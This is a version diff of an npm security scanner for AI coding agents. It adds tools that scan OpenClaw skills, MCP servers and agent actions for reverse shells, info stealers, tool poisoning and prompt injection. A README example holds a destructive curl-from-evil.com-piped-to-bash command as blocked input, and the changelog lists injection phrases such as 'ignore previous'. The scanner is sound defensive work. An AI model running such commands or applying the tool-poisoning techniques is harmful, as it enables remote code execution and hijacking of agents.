agent-security-scanner-mcp 3.8.0 → 3.10.0

package/README.md

@@ -8,11 +8,11 @@ Security scanner for AI coding agents and autonomous assistants. Scans code for
 [![Benchmark: 97.7% precision](https://img.shields.io/badge/precision-97.7%25-brightgreen.svg)](benchmarks/RESULTS.md)
 [![CI](https://github.com/sinewaveai/agent-security-scanner-mcp/actions/workflows/test.yml/badge.svg)](https://github.com/sinewaveai/agent-security-scanner-mcp/actions/workflows/test.yml)
 
-> **New in v3.8.0:** Cross-file taint tracking, project context discovery (frameworks/middleware detection), and Layer 2 LLM-powered security review. Detects vulnerabilities across file boundaries and reduces false positives by understanding project defenses. [See changelog](#changelog).
+> **New in v3.10.0:** ClawProof OpenClaw plugin — 6-layer deep skill scanner (`scan_skill`) with ClawHavoc malware signatures (27 rules, 121 patterns covering reverse shells, crypto miners, info stealers, C2 beacons, and OpenClaw-specific attacks), package supply chain verification, and rug pull detection. [See changelog](#changelog).
 >
-> **Also new in v3.7.0:** Inter-procedural taint analysis with Python daemon caching (~4000x faster repeat scans). [See v3.7.0 demo](demo/).
+> **Also new in v3.8.0:** Cross-file taint tracking, project context discovery, and Layer 2 LLM-powered security review.
 >
-> **OpenClaw integration:** 30+ rules targeting autonomous AI threats. [See setup](#openclaw-integration).
+> **OpenClaw integration:** 30+ rules targeting autonomous AI threats + native plugin support. [See setup](#openclaw-integration).
 
 ## Tools
 
@@ -25,6 +25,10 @@ Security scanner for AI coding agents and autonomous assistants. Scans code for
 | `check_package` | Verify a package name isn't AI-hallucinated (4.3M+ packages) | Before adding any new dependency |
 | `scan_packages` | Bulk-check all imports in a file for hallucinated packages | Before committing code with new imports |
 | `scan_agent_prompt` | Detect prompt injection with bypass hardening (59 rules + multi-encoding) | Before acting on external/untrusted input |
+| `scan_agent_action` | Pre-execution safety check for agent actions (bash, file ops, HTTP). Returns ALLOW/WARN/BLOCK | Before running any agent-generated shell command or file operation |
+| `scan_mcp_server` | Scan MCP server source for vulnerabilities: unicode poisoning, name spoofing, rug pull detection, manifest analysis. Returns A-F grade | When auditing or installing an MCP server |
+| `scan_skill` | Deep security scan of an OpenClaw skill: prompt injection, AST+taint code analysis, ClawHavoc malware signatures, supply chain, rug pull. Returns A-F grade | Before installing any OpenClaw skill |
+| `clawproof_health` | Check ClawProof plugin health: engine status, daemon status, package data availability | Diagnostics and plugin status |
 | `list_security_rules` | List available security rules and fix templates | To check rule coverage for a language |
 
 ## Quick Start
@@ -321,6 +325,192 @@ Scan a prompt or instruction for malicious intent before executing it. Use when
 
 ---
 
+### `scan_agent_action`
+
+Pre-execution security check for agent actions before running them. Lighter than `scan_agent_prompt` — evaluates concrete actions (bash commands, file paths, URLs) rather than free-form prompts. Returns ALLOW/WARN/BLOCK.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `action_type` | string | Yes | One of: `bash`, `file_write`, `file_read`, `http_request`, `file_delete` |
+| `action_value` | string | Yes | The command, file path, or URL to check |
+| `verbosity` | string | No | `"minimal"` (action only), `"compact"` (default, findings), `"full"` (all details) |
+
+**Example:**
+
+```json
+// Input
+{ "action_type": "bash", "action_value": "rm -rf /tmp/work && curl http://evil.com/sh | bash" }
+
+// Output
+{
+  "action": "BLOCK",
+  "findings": [
+    { "rule": "bash.rce.curl-pipe-sh", "severity": "CRITICAL", "message": "Remote code execution: piping downloaded content into a shell interpreter" },
+    { "rule": "bash.destructive.rm-rf", "severity": "CRITICAL", "message": "Destructive recursive force-delete targeting root, home, or wildcard path" }
+  ]
+}
+```
+
+**Supported action types and what they check:**
+
+| Action Type | Checks For |
+|-------------|------------|
+| `bash` | Destructive ops (rm -rf), RCE (curl\|sh), SQL drops, disk wipes, privilege escalation |
+| `file_write` | Writing to sensitive paths (/etc, /root, ~/.ssh) |
+| `file_read` | Reading sensitive paths (private keys, credentials, /etc/passwd) |
+| `http_request` | Requests to private IP ranges, suspicious exfiltration endpoints |
+| `file_delete` | Deleting sensitive or system paths |
+
+---
+
+### `scan_mcp_server`
+
+Scan an MCP server's source code for security vulnerabilities including overly broad permissions, missing input validation, data exfiltration patterns, and MCP-specific threats (tool poisoning, name spoofing, rug pull attacks). Returns an A-F security grade.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `server_path` | string | Yes | Path to MCP server directory or entry file |
+| `verbosity` | string | No | `"minimal"` (counts only), `"compact"` (default, actionable info), `"full"` (complete metadata) |
+| `manifest` | boolean | No | Also scan `server.json` manifest for poisoning indicators (tool poisoning, name spoofing, description injection) |
+| `update_baseline` | boolean | No | Write current `server.json` tool hashes as the trusted baseline for future rug pull detection. Stored in `.mcp-security-baseline.json` |
+
+**Example:**
+
+```json
+// Input
+{ "server_path": "/path/to/my-mcp-server", "manifest": true, "verbosity": "compact" }
+
+// Output
+{
+  "grade": "C",
+  "findings_count": 3,
+  "findings": [
+    { "rule": "mcp.unicode-zero-width", "severity": "ERROR", "file": "index.js", "line": 12, "message": "Zero-width Unicode character in tool description — common tool poisoning technique" },
+    { "rule": "mcp.tool-name-spoofing", "severity": "ERROR", "file": "index.js", "line": 8, "message": "Tool name 'readFi1e' is 1 edit away from well-known tool 'readFile'" },
+    { "rule": "mcp.overly-broad-permissions", "severity": "WARNING", "file": "index.js", "line": 44, "message": "Server requests write access to all file paths" }
+  ],
+  "recommendations": [
+    "Remove hidden Unicode characters from all tool names and descriptions",
+    "Verify tool names do not mimic legitimate MCP tools"
+  ]
+}
+```
+
+**Detection capabilities:**
+
+| Category | Rules | Threat |
+|----------|-------|--------|
+| Unicode poisoning | `mcp.unicode-zero-width`, `mcp.unicode-bidi-override`, `mcp.unicode-homoglyph` | Hidden characters in tool descriptions used to inject instructions |
+| Description injection | `mcp.description-injection`, `mcp.manifest-description-injection` | Imperative language in descriptions directed at the LLM |
+| Tool name spoofing | `mcp.tool-name-spoofing`, `mcp.manifest-name-spoofing` | Names ≤2 Levenshtein edits from well-known tools |
+| Rug pull detection | `mcp.rug-pull-detected` | Tool schema changes since baseline (requires `update_baseline` first run) |
+| Insecure patterns | 24+ rules | `eval`, `exec`, hardcoded secrets, broad file access, shell injection |
+
+**Rug pull workflow:**
+
+```bash
+# 1. On first install — record trusted baseline
+scan_mcp_server({ server_path: "...", manifest: true, update_baseline: true })
+
+# 2. On each subsequent use — detect changes
+scan_mcp_server({ server_path: "...", manifest: true })
+# → alerts with mcp.rug-pull-detected if any tool changed
+```
+
+---
+
+### `scan_skill`
+
+Deep security scan of an OpenClaw skill directory or `SKILL.md` file. Runs 6 layers of analysis and returns an A-F security grade.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `skill_path` | string | Yes | Path to skill directory or `SKILL.md` file (must be within cwd or `~/.openclaw/skills/`) |
+| `verbosity` | string | No | `"minimal"` (grade + counts), `"compact"` (default, findings list), `"full"` (all metadata) |
+| `baseline` | boolean | No | Save current scan as SHA-256 baseline for future rug pull detection |
+
+**Example:**
+
+```json
+// Input
+{ "skill_path": "~/.openclaw/skills/my-skill", "verbosity": "compact" }
+
+// Output
+{
+  "skill_path": "/Users/you/.openclaw/skills/my-skill",
+  "grade": "F",
+  "recommendation": "DO NOT INSTALL - This skill contains critical security threats that pose immediate risk",
+  "findings_count": 3,
+  "findings": [
+    {
+      "source": "clawhavoc",
+      "category": "reverse_shell",
+      "severity": "CRITICAL",
+      "message": "Bash reverse shell detected — opens interactive shell over TCP",
+      "rule_id": "clawhavoc.revshell.bash",
+      "confidence": "HIGH"
+    }
+  ],
+  "layers_executed": {
+    "L1_prompt": true,
+    "L2_code_blocks": true,
+    "L3_supporting_files": true,
+    "L4_clawhavoc": true,
+    "L5_supply_chain": true,
+    "L6_rug_pull": true
+  }
+}
+```
+
+**6-layer analysis pipeline:**
+
+| Layer | What It Checks |
+|-------|---------------|
+| L1 Prompt Scan | 59+ prompt injection rules against skill instructions |
+| L2 Code Blocks | Bash via action scanner; JS/Python/etc via AST+taint analysis |
+| L3 Supporting Files | All code files in the skill directory (capped at 20 files) |
+| L4 ClawHavoc Signatures | 27 malware rules, 121 regex patterns across 10 threat categories |
+| L5 Supply Chain | Package hallucination detection across npm, PyPI, RubyGems, crates, Dart, Perl |
+| L6 Rug Pull | SHA-256 baseline comparison to detect post-install content tampering |
+
+**ClawHavoc threat categories:**
+
+| Category | Examples |
+|----------|---------|
+| Reverse Shells | Bash `/dev/tcp`, netcat `-e`, Python socket+dup2, Perl/Ruby TCP |
+| Crypto Miners | XMRig, CoinHive, stratum+tcp, WebAssembly miners |
+| Info Stealers | Browser cookies/Login Data, macOS Keychain, Atomic Stealer, RedLine, Lumma/wallet |
+| Keyloggers | CGEventTapCreate, pynput, SetWindowsHookEx, NSEvent.addGlobalMonitor |
+| Screen Capture | Screenshot + upload/webhook combinations |
+| DNS Exfiltration | nslookup/dig with command substitution, base64+DNS |
+| C2 Beacons | Periodic HTTP callbacks (setInterval+fetch, while+requests+sleep) |
+| OpenClaw Attacks | Config theft, SOUL.md tampering, session hijacking, gateway token theft |
+| Campaign Patterns | Webhook exfiltration to known attacker infrastructure |
+| Exfil Endpoints | Known malicious domains and staging servers |
+
+**Rug pull workflow:**
+
+```bash
+# 1. On first install — record trusted baseline
+scan_skill({ skill_path: "~/.openclaw/skills/my-skill", baseline: true })
+
+# 2. On each subsequent check — detect content changes
+scan_skill({ skill_path: "~/.openclaw/skills/my-skill" })
+# → grade F if any content changed since baseline
+```
+
+**Security notes:**
+- `skill_path` must be within `process.cwd()` or `~/.openclaw/skills/` — symlink escapes are rejected
+- Scan times out at 120 seconds with a grade F on timeout
+
+---
+
 ### `list_security_rules`
 
 List all 1700+ security scanning rules and 120 fix templates. Use to understand what vulnerabilities the scanner detects or to check coverage for a specific language or vulnerability type.
@@ -715,12 +905,28 @@ The scanner includes 30+ rules targeting OpenClaw's unique attack surface:
 | **Unsafe Automation** | "Run hourly without asking", "Disable safety checks" |
 | **Service Attacks** | "Delete all repos", "Make payment to..." |
 
+### Skill Scanning (New in v3.10.0)
+
+Before installing any skill from ClawHub or other sources:
+
+```bash
+node index.js scan-skill ~/.openclaw/skills/some-skill
+```
+
+Or via MCP:
+```json
+{ "skill_path": "~/.openclaw/skills/some-skill", "verbosity": "compact" }
+```
+
+Returns grade A-F with findings from 6 layers of analysis. Grade F = do not install.
+
 ### Usage in OpenClaw
 
 The skill is auto-discovered. Use it by asking:
 - "Scan this prompt for security issues"
 - "Check if this code is safe to run"
 - "Verify these packages aren't hallucinated"
+- "Scan this skill before I install it"
 
 ---
 
@@ -782,11 +988,11 @@ AI coding agents introduce attack surfaces that traditional security tools weren
 |----------|-------|
 | **Transport** | stdio |
 | **Package** | `agent-security-scanner-mcp` (npm) |
-| **Tools** | 8 |
+| **Tools** | 12 |
 | **Languages** | 12 |
 | **Ecosystems** | 7 |
 | **Auth** | None required |
-| **Side Effects** | Read-only |
+| **Side Effects** | Read-only (except `scan_mcp_server` with `update_baseline: true`, which writes `.mcp-security-baseline.json`) |
 | **Package Size** | 2.7 MB (base) / 10.3 MB (with npm) |
 
 ---
@@ -864,6 +1070,27 @@ All MCP tools support a `verbosity` parameter to minimize context window consump
 
 ## Changelog
 
+### v3.10.0
+- **`scan_skill` Tool** — 6-layer deep security scanner for OpenClaw skills: prompt injection (59+ rules), AST+taint code analysis, ClawHavoc malware signatures, package supply chain verification, and SHA-256 rug pull detection. Returns A-F grade with hard-fail on ClawHavoc/rug pull/critical findings
+- **ClawHavoc Signature Database** (`rules/clawhavoc.yaml`) — 27 rules, 121 regex patterns across 10 threat categories (reverse shells, crypto miners, info stealers, keyloggers, screen capture, DNS exfiltration, C2 beacons, OpenClaw-specific attacks, campaign patterns, exfil endpoints), mapped to MITRE ATT&CK
+- **OpenClaw Plugin Skeleton** — Native plugin manifest (`openclaw.plugin.json`), config loader (`~/.openclaw/scanner-config.json`), and health check endpoint (`clawproof_health` MCP tool)
+- **CLI**: `scan-skill <path>` command with `--baseline` flag; `audit` and `harden` stubs (experimental)
+- **Security fixes**: Path containment uses `realpathSync` to prevent symlink bypass; dedup key includes `source` to prevent ClawHavoc findings from being suppressed by same-named code_analysis findings
+- **Bug fix**: SQL injection concat detection now covers JavaScript (was C#-only) — single-quoted and template literal strings now detected
+- Tests: 462 passed (up from 433, includes 34 scan-skill tests and 14 plugin-integration tests)
+
+### v3.8.0
+- **`scan_mcp_server` Tool** - New tool for auditing MCP servers: scans source code for 24+ vulnerability patterns, unicode/homoglyph poisoning, tool name spoofing (Levenshtein distance), description injection, and returns A-F security grade
+- **Unicode Poisoning Detection** - Detects zero-width characters (U+200B/C/D, FEFF, 2060), bidirectional override characters (U+202A-202E, 2066-2069), and mixed-script homoglyph substitutions (Cyrillic/ASCII adjacency)
+- **Tool Name Spoofing Detection** - Levenshtein-based comparison against 35 well-known MCP tool names; flags names ≤2 edits from known tools (e.g. `readFi1e` → `readFile`)
+- **Description Injection Classifier** - Detects imperative/injection-style language in tool descriptions (`ignore previous`, `exfiltrate`, `override instructions`, etc.)
+- **`server.json` Manifest Parsing** - `manifest: true` parameter scans MCP manifest alongside source; catches poisoning that lives in the manifest, not the source
+- **Rug Pull Detection** - `update_baseline: true` hashes each tool's name+description into `.mcp-security-baseline.json`; future scans alert on any change (Adversa TOP25 #6)
+- **`scan_agent_action` Tool** - Pre-execution safety check for concrete agent actions (bash, file_write, file_read, http_request, file_delete); lighter-weight than scan_agent_prompt for evaluating specific operations
+- **Cross-File Taint Tracking** - Import graph tracking for dataflow analysis across module boundaries
+- **Project Context Discovery** - Framework and middleware detection to reduce false positives by understanding project defenses
+- **Layer 2 LLM-Powered Review** - Optional deeper analysis pass for complex security patterns
+
 ### v3.7.0
 - **Python Daemon** - Long-running Python process with JSONL protocol (~10x faster repeat scans via LRU caching of 200 entries keyed by file mtime)
 - **Daemon Client** - Auto-start, health checks, graceful shutdown, automatic fallback to sync mode on failure (3 restarts/60s limit)

package/index.js

@@ -180,6 +180,41 @@ server.tool(
   scanMcpServer
 );
 
+// ===========================================
+// OPENCLAW SKILL SCANNING
+// ===========================================
+
+server.tool(
+  "scan_skill",
+  "Deep security scan of an OpenClaw skill. Multi-layer analysis: prompt injection detection, code analysis (AST+taint), ClawHavoc malware signatures, package supply chain verification, rug pull detection. Returns security grade A-F with detailed findings.",
+  {
+    skill_path: z.string().describe("Path to skill directory or SKILL.md file"),
+    verbosity: z.enum(['minimal', 'compact', 'full']).optional().describe("Response detail level"),
+    baseline: z.boolean().optional().describe("Save current scan as baseline for rug pull detection"),
+  },
+  async ({ skill_path, verbosity, baseline }) => {
+    const { scanSkill } = await import('./src/tools/scan-skill.js');
+    return scanSkill({ skill_path, verbosity, baseline });
+  }
+);
+
+// ===========================================
+// PLUGIN HEALTH CHECK
+// ===========================================
+
+server.tool(
+  "clawproof_health",
+  "Check plugin health: engine status, daemon status, package data availability",
+  {},
+  async () => {
+    const { getHealthStatus } = await import('./src/plugin-health.js');
+    const health = await getHealthStatus();
+    return {
+      content: [{ type: "text", text: JSON.stringify(health, null, 2) }]
+    };
+  }
+);
+
 // ===========================================
 // CLI COMMANDS - Extracted to src/cli/
 // ===========================================
@@ -397,6 +432,41 @@ if (cliArgs[0] === 'init') {
     console.error(JSON.stringify({ error: err.message }));
     process.exit(1);
   });
+} else if (cliArgs[0] === 'scan-skill') {
+  const skillPath = cliArgs[1];
+  if (!skillPath) {
+    console.error('Usage: agent-security-scanner-mcp scan-skill <skill-path> [--verbosity minimal|compact|full] [--baseline]');
+    process.exit(1);
+  }
+  const verbosityIdx = cliArgs.indexOf('--verbosity');
+  const verbosity = verbosityIdx !== -1 ? cliArgs[verbosityIdx + 1] : 'compact';
+  const baseline = cliArgs.includes('--baseline');
+
+  // Load package lists for supply chain scanning
+  const { loadPackageLists } = await import('./src/tools/check-package.js');
+  loadPackageLists();
+
+  const { scanSkill } = await import('./src/tools/scan-skill.js');
+  scanSkill({ skill_path: skillPath, verbosity, baseline }).then(result => {
+    const output = JSON.parse(result.content[0].text);
+    console.log(JSON.stringify(output, null, 2));
+    process.exit(output.grade === 'F' || output.grade === 'D' ? 1 : 0);
+  }).catch(err => {
+    console.error(JSON.stringify({ error: err.message }));
+    process.exit(1);
+  });
+} else if (cliArgs[0] === 'audit') {
+  const { runAudit } = await import('./src/cli/audit.js');
+  runAudit(cliArgs.slice(1)).then(() => process.exit(0)).catch(err => {
+    console.error(`  Error: ${err.message}\n`);
+    process.exit(1);
+  });
+} else if (cliArgs[0] === 'harden') {
+  const { runHarden } = await import('./src/cli/harden.js');
+  runHarden(cliArgs.slice(1)).then(() => process.exit(0)).catch(err => {
+    console.error(`  Error: ${err.message}\n`);
+    process.exit(1);
+  });
 } else if (cliArgs[0] === '--help' || cliArgs[0] === '-h' || cliArgs[0] === 'help') {
   console.log('\n  agent-security-scanner-mcp\n');
   console.log('  Commands:');
@@ -409,12 +479,15 @@ if (cliArgs[0] === 'init') {
   console.log('  CLI Tools (for scripts & OpenClaw):');
   console.log('    scan-prompt <text>   Scan prompt for injection attacks');
   console.log('    scan-security <file> Scan file for vulnerabilities');
+  console.log('    scan-skill <path>    Scan OpenClaw skill for security threats [--baseline]');
   console.log('    check-package <n> <e> Check if package exists in ecosystem');
   console.log('    scan-packages <f> <e> Scan file imports for hallucinated packages');
   console.log('    scan-project <dir>   Scan directory for vulnerabilities with grading');
   console.log('    scan-diff [base] [target] Scan git diff for new vulnerabilities');
   console.log('    scan-mcp <path>      Scan MCP server source for security issues');
-  console.log('    scan-action <t> <v>  Check agent action before execution\n');
+  console.log('    scan-action <t> <v>  Check agent action before execution');
+  console.log('    audit [--config-path] Audit OpenClaw config for security issues [experimental]');
+  console.log('    harden [--fix]       Auto-harden OpenClaw configuration [experimental]\n');
   console.log('    (no args)            Start MCP server on stdio\n');
   console.log('  Options:');
   console.log('    --verbosity <level>  minimal|compact|full (default: compact)');
@@ -440,6 +513,13 @@ if (cliArgs[0] === 'init') {
     await server.connect(transport);
     console.error("Security Scanner MCP Server running on stdio");
 
+    // Pre-warm daemon in background (non-blocking)
+    if (process.env.SCANNER_PREWARM !== '0') {
+      import('./src/daemon-client.js').then(({ getDaemonClient }) => {
+        getDaemonClient().preWarm().catch(() => {});
+      }).catch(() => {});
+    }
+
     // Shutdown daemon when MCP server closes
     server.server.onclose = async () => {
       await shutdownDaemon();

package/openclaw.plugin.json

@@ -0,0 +1,41 @@
+{
+  "name": "agent-security-scanner",
+  "version": "3.9.0",
+  "description": "Security scanner for OpenClaw: prompt injection firewall, package hallucination detection, code vulnerability scanning, auto-fix",
+  "author": "Sinewave AI",
+  "license": "MIT",
+  "openclaw": {
+    "extensions": ["tools", "skills"],
+    "emoji": "shield",
+    "permissions": ["fs:read"]
+  },
+  "tools": [
+    {
+      "name": "scan_security",
+      "description": "Scan a file for security vulnerabilities"
+    },
+    {
+      "name": "scan_agent_prompt",
+      "description": "Scan a prompt for injection attacks"
+    },
+    {
+      "name": "check_package",
+      "description": "Verify a package is not hallucinated"
+    },
+    {
+      "name": "scan_agent_action",
+      "description": "Pre-execution safety check for agent actions"
+    },
+    {
+      "name": "scan_skill",
+      "description": "Scan an OpenClaw skill for security threats"
+    },
+    {
+      "name": "clawproof_health",
+      "description": "Check plugin health status"
+    }
+  ],
+  "skills": [
+    "skills/openclaw/SKILL.md"
+  ]
+}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "agent-security-scanner-mcp",
-  "version": "3.8.0",
+  "version": "3.10.0",
   "mcpName": "io.github.sinewaveai/agent-security-scanner-mcp",
   "description": "Security scanner MCP server for AI coding agents. Prompt injection firewall, package hallucination detection (4.3M+ packages), 1000+ vulnerability rules with AST & taint analysis, auto-fix. For Claude Code, Cursor, Windsurf, Cline, OpenClaw.",
   "main": "index.js",
@@ -90,6 +90,9 @@
     "src/config.js",
     "src/history.js",
     "src/typosquat.js",
+    "src/plugin-config.js",
+    "src/plugin-health.js",
+    "openclaw.plugin.json",
     "templates/**",
     "analyzer.py",
     "ast_parser.py",

package/regex_fallback.py

@@ -475,6 +475,8 @@ def _scan_javascript(lines: List[str]) -> List[Dict]:
 
         if re.search(r"\bdb\.query\s*\(.*\+\s*\w", line):
             findings.append(_make_finding("sql-injection", i, line))
+        if re.search(r'''(?:["'`])SELECT\b[^"'`]*["'`]\s*\+''', line, re.IGNORECASE):
+            findings.append(_make_finding("sql-injection-concat", i, line))
 
         if re.search(r"createHash\s*\(\s*['\"]md5['\"]", line, re.IGNORECASE):
             findings.append(_make_finding("insecure-hash-md5", i, line))
@@ -677,7 +679,7 @@ def _scan_csharp(lines: List[str]) -> List[Dict]:
             findings.append(_make_finding("sql-injection-sqlcommand", i, line))
         if re.search(r"\bSqlQuery\b.*\+\s*\w", line):
             findings.append(_make_finding("sql-injection-sqlquery", i, line))
-        if re.search(r"\"SELECT\b.*\"\s*\+\s*\w", line, re.IGNORECASE):
+        if re.search(r'''(?:["'`])SELECT\b[^"'`]*["'`]\s*\+''', line, re.IGNORECASE):
             findings.append(_make_finding("sql-injection-concat", i, line))
         if re.search(r"\bProcess\.Start\s*\(", line):
             findings.append(_make_finding("command-injection-process-start", i, line))